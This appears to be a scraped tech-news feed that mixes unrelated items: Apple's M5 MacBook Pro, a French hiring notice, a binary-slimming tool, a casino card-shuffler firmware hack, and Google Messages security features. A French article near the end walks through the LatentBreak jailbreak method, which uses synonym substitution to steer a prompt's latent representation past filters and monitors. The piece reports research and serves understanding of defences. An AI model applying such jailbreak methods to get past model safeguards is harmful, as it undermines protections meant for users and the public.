Apple's new laptop is equipped with a backlit Magic Keyboard that supports Touch ID, and has a Force Touch trackpad. The device supports 70W/96W fast charging via a USB-C Power Adapter. The Cupertino company says that the laptop's 72.4 watt-hour battery offers up to 24 hours of battery life (video streaming). The device measures 12.31 x 8.71 x 0.61 inches (31.26 x 22.12 x 1.55 cm), and weighs 3.4 pounds (1.55kg).

Apple has priced the 14-inch M5 MacBook Pro starting at $1599. It is available in 2 colorways: Space Black and Silver. The laptop is available for pre-order now, it will start shipping from October 22.

Apple has not included the M5 MacBook Pro charger in the box in the UK, and EU region, the charger is included in the US. It is selling the 70W charger separately for £59.00 in the UK, and €65,00 in the EU. The 96W charger costs £79.00 or €85,00. The EU has a common charger rule that say manufacturers should offer devices without a charger, for a lower price. This law was announced in December 2024. But the rule doesn't come into effect for laptops until April 2026.

Apple has also launched a new iPad Pro with an M5 chip, starting at $999.

Thank you for being a Ghacks reader. The post Apple announces 14-inch M5 MacBook Pro appeared first on gHacks Technology News.

Bienvenue à Adrien Olivereau, Chargé de mission Hôtellerie
Transaxio Hôtel, partenaire In Extenso est fier d'annoncer l'arrivée d'Adrien Olivereau au sein de son équipe en tant que Chargé de Mission Hôtellerie. Cette nouvelle recrue aura en charge Paris et la région Île-de-France et renforce ainsi notre expertise et notre présence sur ce marché stratégique.
Diplômé de l'EDHEC Business School à Lille puis de l'ESAN Graduate School of Business à Lima (Pérou) et fortement enraciné dans le secteur hôtelier, (...)

- Communiqué de presse / Transaxio Hôtel, nomination

Vous avez un Mac M1, M2, M3 ou M4 ? Bonne nouvelle, vous trimballez probablement entre 50 et 100 GB de code complètement inutile que votre processeur n’exécutera jamais et ce, depuis le jour où vous avez acheté votre superbe machine.

Les coupables ce sont les binaires universels de vos plugins audio (VST…etc) et vos apps traditionnelles qui contiennent maintenant deux versions complètes du code : une pour Intel, une pour Apple Silicon. Et comme votre Mac n’utilise qu’une seule de ces versions, mais vous payez le prix fort en espace disque pour les deux.

Car depuis 2020 et la transition vers Apple Silicon, Apple a choisi la simplicité : un seul fichier pour tout le monde ! Le développeur compile son code deux fois (Intel + ARM), colle les deux versions ensemble, et hop, vous vous retrouvez avec des fichiers littéralement deux fois plus gros qu’ils ne devraient l’être.

Et c’est là qu’ Unfatten entre en jeu. Ce petit outil gratuit fait exactement ce que son nom indique : il dégonfle vos plugins et vos applications en supprimant la partie du code que vous n’utilisez pas. Si vous êtes sur Apple Silicon, il vire le code Intel et si vous êtes encore sur Intel, il peut virer le code ARM (mais attention, si vous comptez upgrader votre Mac un jour, vous devrez tout réinstaller).

L’utilisation est ultra simple, vous sélectionnez les dossiers contenant vos apps et plugins, vous choisissez les formats à scanner (AAX, VST, VST3, AU), et vous lancez le scan. L’outil propose un mode simulation qui permet de voir exactement combien d’espace vous allez récupérer sans rien toucher et une fois que vous avez vu les chiffres (et croyez-moi, ils font mal), vous pouvez lancer le nettoyage réel !

Pensez quand même à faire un backup de vos plugins avant car on n’est jamais trop prudent avec ses plugins audio à 200 euros pièce qu’on ne peut pas toujours re-télécharger facilement. Après pour les apps, c’est moins critique, suffit de la réinstaller.

Pensez aussi à repasser un petit coup de Unfatten après d’éventuelles mises à jours des apps ou des plugins.

D’ailleurs, j’sais pas si vous savez mais macOS 26 Tahoe est la dernière version à supporter du x64 avec Rosetta 2, qui permet de faire tourner les apps Intel sur Apple Silicon.

Voilà, l’outil est disponible ici sur avelio.tech/unfatten et si au premier lancement, vous avez un avertissement de sécurité, passez par Sentinel pour le débloquer.

Merci à Lorenper pour l’info !

Vous connaissez peut-être ces machines à mélanger les cartes qu’on trouve dans tous les casinos américains ?

Moi je ne savais même pas que ça existait, mais apparemment, le Deckmate 2, fabriqué par Shufflemaster (devenu depuis Light and Wonder), c’est la Rolls des shufflers. Un shuffler c’est pas un légume dégeu, c’est un mélangeur de cartes et on en trouve notamment au World Series of Poker (La biz à Patrick Bruel ^^), et dans tous les grands poker rooms de Vegas.

Cela permet d’automatiser le mélange pour accélérer le jeu et surtout éviter que ceux qui distribuent les cartes (les dealers) trichent avec de faux mélanges. La machine a même une caméra intégrée qui scanne chaque carte pour détecter si quelqu’un essaie de retirer un as ou d’ajouter un sept de pique.

En septembre 2022, il y a eu un scandale qui a secoué le monde du poker. Au Hustler Casino Live de Los Angeles, une joueuse relativement débutante, Robbi Jade Lew, gagne un pot de 269 000 dollars avec un call complètement fou. Elle avait valet-quatre dépareillés (un truc nul), et son adversaire Garrett Adelstein bluffait avec huit-sept. Techniquement, son call était correct, mais aucun joueur sensé n’aurait misé 109 000 dollars sur une main pareille sans savoir que l’adversaire bluffait… Le casino a donc lancé une enquête et conclu que le shuffler ne pouvait pas être compromis.

Mais même si ce n’était pas le cas pour cette affaire, est ce que c’est vrai ? Est ce qu’un Deckmate 2 peut être hacké ? Pour le chercheur en sécurité, Joseph Tartaro, ça s’est présenté comme un nouveau défi personnel !

Il a donc acheté un Deckmate 2 d’occasion avec deux collègues et a passé des mois à le démonter… pour finalement trouver quelques trucs intéressants, vous allez voir.

Il a découvert que la machine a un port USB accessible sous la table, là où les joueurs posent les genoux. Tartaro a donc créé un mini-ordinateur de la taille d’une clé USB qui, une fois branché, réécrit le firmware de la machine. La seule sécurité qu’il y a, c’est au démarrage, quand la machine vérifie que le code n’a pas changé en comparant son empreinte à une valeur connue.

C’est une simple comparaison de hash et le problème est que Tartaro peut modifier cette valeur de référence aussi… Du coup, le système de vérification contrôle que le code piraté correspond au hash piraté. C’est ballot ^^. Et une fois le firmware modifié, la machine continue à fonctionner normalement sauf qu’elle transmet maintenant l’ordre exact des 52 cartes via Bluetooth vers une app smartphone. Et comme la caméra interne de ce Deckmate 2 scanne déjà toutes les cartes pour détecter les fraudes, il suffit d’exploiter cette fonctionnalité.

Un journaliste de Wired a décidé de mettre ça en pratique dans des conditions réelles et vous allez voir, c’est sympa à voir.

Le truc génial, c’est que même si le dealer coupe le paquet (ce qui est obligatoire), l’app peut recalculer l’ordre final. Il suffit alors de regarder ses deux premières cartes et de les entrer dans l’app pour qu’elle déduise où le paquet a été coupé. À partir de là, vous connaissez toutes les mains de tous les joueurs et les cartes communes qui vont sortir.

Quand Tartaro a présenté ses résultats à Black Hat en 2023, Light and Wonder a réagi en disant que le hack était “non réaliste en conditions de casino”. Puis en 2024, la boîte a affirmé avoir patché le firmware de “virtuellement tous les shufflers” dans le monde.

Mais Tartaro reste quand même sceptique car les machines n’ont pas de connexion internet. Un technicien doit physiquement mettre à jour chaque appareil et même si le port USB est désactivé, le port Ethernet reste exploitable. Et si l’un de ces techniciens de maintenance décide de pirater la machine, aucun patch ne pourra l’en empêcher…

Bref, encore une fois, plus c’est complexe, plus c’est vulnérable.

Google has announced a couple of security upgrades for its texting app, Messages. It can now detect and block suspicious links, and adds a way to verify your contacts.

The first of these two features is Safer links. It is a scam link blocker that detects when a message may contain a link from spammers. In order to protect users from malware that could steal their identity, Google Messages will display a pop-up warning that says "Link Blocked. This message was flagged as likely spam." Users can close the warning to get back to safety. If you think that a message was falsely detected as spam, you can tap on "not spam" to unlock the link. Google says that scam link blocking is now available for all Google Messages users worldwide.

The other security feature that has been added to Google Messages is called Key Verifier. This was originally announced in May 2025, but was only launched yesterday. As the name suggests, this feature is used to verify the identity of a contact. Scammers often impersonate other people, including persons whom you may know, or have been in contact with. If their device is stolen, lost or was a victim of a SIM swap attack, you may not know it, and believe you are talking with your contact. Such attacks have been used to spy on people.

Key Verifier is designed to prevent such impersonation, this RCS feature uses public key verification, to improve the security of end-to-end encrypted (E2EE) messaging apps. It allows users to verify each other's identity by scanning their respective QR codes, to verify the keys. So you can scan your contact's QR code, and ask them to do the same, to ensure you are talking to the right person on the other end.

Keys can change when your contact moves to a new device, or replaces their SIM card, or when the key's time-bound validity expires, or if the underlying encryption protocol is upgraded. Google warns that SIM Swapping and Man-in-the-middle attacks could also cause contact's keys to change. Either way, you'll know when that happens.

Key Verifier is available for devices running Android 10 and above. You will need the latest Google Contacts, Google Messages, and the Android System Key Verifier apps to use the feature. You can learn more about it at the official support page.

Earlier this year, Google Messages had introduced an unsubscribe button to combat spam. Yesterday, Google unveiled a new way to recover user accounts with the help of Recovery Contacts. Users may also unlock their account using the mobile number that was associated with their Google Account.

Thank you for being a Ghacks reader. The post Google Message gets a Scam Link Blocker and Key Verifier appeared first on gHacks Technology News.

Et si on pouvait pirater une IA non pas en la forçant, mais en la convainquant qu’elle est toujours du bon côté de la barrière ?? Ce serait pas un truc fun à faire ça quand même ? Hé bien c’est exactement ce que vient de faire une équipe de chercheurs en sécurité avec LatentBreak, une technique qui ressemble plus, je trouve, à de l’hypnose qu’à du véritable hacking.

Ainsi, plutôt que de bombarder ChatGPT ou Llama avec des prompts bizarres bourrés de caractères spéciaux pour les faire bugger (comme le font les anciennes techniques de jailbreak), LatentBreak joue sur la perception interne du modèle. L’IA croit en fait sincèrement répondre à une question innocente alors qu’elle génère du contenu dangereux. Un peu comme quand votre pervers narcissique préféré vous manipule pour vous faire croire que vous faites un truc bien et important alors que c’est de la merde et que ça vous enfonce encore plus…

Comme expliqué dans le document de recherche , les anciennes attaques comme GCG , GBDA ou AutoDAN ajoutaient des suffixes louches aux prompts, ce qui augmentait ce qu’on appelle la “perplexity”. La perplexity, c’est un indicateur de bizarrerie textuelle et cela, les filtres de sécurité sont maintenant capables de les détecter et de les bloquer.

LatentBreak contourne donc le problème en restant parfaitement naturel. L’algorithme remplace des mots par des synonymes, mais pas n’importe comment puisqu’il choisit chaque substitution pour déplacer la représentation interne du prompt vers les zones “sûres” du modèle, c’est à dire celles qui ne déclenchent aucune alarme. Le prompt reste alors fluide, compréhensible, inoffensif en apparence mais dans l’“inconscient” de l’IA, dans cet espace latent invisible où elle calcule ses réponses, le sens glisse subtilement vers quelque chose de complètement différent.

À chaque itération, l’algorithme de LatentBreak prend un mot du prompt et génère jusqu’à 20 alternatives via un autre modèle comme GPT-4o-mini et chaque variante est évaluée sur deux critères : est-ce qu’elle rapproche le vecteur interne du prompt d’un “centre de sécurité” dans l’espace latent, et est-ce que le sens global reste cohérent ?

La meilleure option est alors intégrée, et le nouveau prompt est testé sur le modèle cible. Si ça provoque une réponse normalement interdite, c’est gagné. Sinon, on recommence jusqu’à 30 fois de suite.

Et apparemment, les résultats sont impressionnants. Ils ont testé cette approche sur 13 modèles différents dont Llama-3, Mistral-7B, Gemma-7B, Vicuna-13B et Qwen-7B et LatentBreak affiche un taux de réussite entre 55 et 85% selon les cas. Les anciennes techniques tombant de toute façon à zéro face aux défenses modernes et tout ça en allongeant que de très peu la longueur du prompt.

LatentBreak passe d’ailleurs à travers des défenses réputées solides… Par exemple, R2D2 et Circuit Breakers, des systèmes qui analysent les signaux internes des neurones pour détecter les anomalies, se font totalement avoir parce qu’ils scannent le texte visible et les patterns de surface, mais pas la “pensée interne” du modèle.

Cette technique révèle quelque chose de fondamental à comprendre sur l’architecture des LLM modernes. Ces derniers ont une forme de dissonance cognitive qui est exploitable. Leur représentation interne ne correspond pas toujours à leur comportement affiché, et d’ailleurs les substitutions les plus efficaces se produisent près des dernières couches du modèle, là où la “décision” finale se forme. C’est à ce moment précis qu’on peut glisser le prompt dans une zone cognitive différente sans que les alarmes ne sonnent.

Bien sûr, LatentBreak nécessite un accès aux structures internes du modèle (donc pas de panique, ChatGPT ne va pas se faire pirater comme ça demain), ce qui limite son usage à des contextes de recherche ou aux modèles open source.

Le parallèle avec les techniques de social engineering qu’on connait est d’ailleurs frappant parce que quand vous manipulez quelqu’un, vous ne le forcez pas brutalement. Vous trouvez les bons mots, le bon contexte, vous lui donnez une perception qui correspond à ce que vous voulez… Bref, vous faites en sorte que la personne croie agir selon ses propres valeurs alors qu’elle fait exactement ce que vous voulez. Hé bien LatentBreak fait à peu près la même chose avec les IA en n’attaquant pas de front les protections, mais en les contournant en douceur en réécrivant la “mémoire de travail” du modèle.

Sympa non ?

Source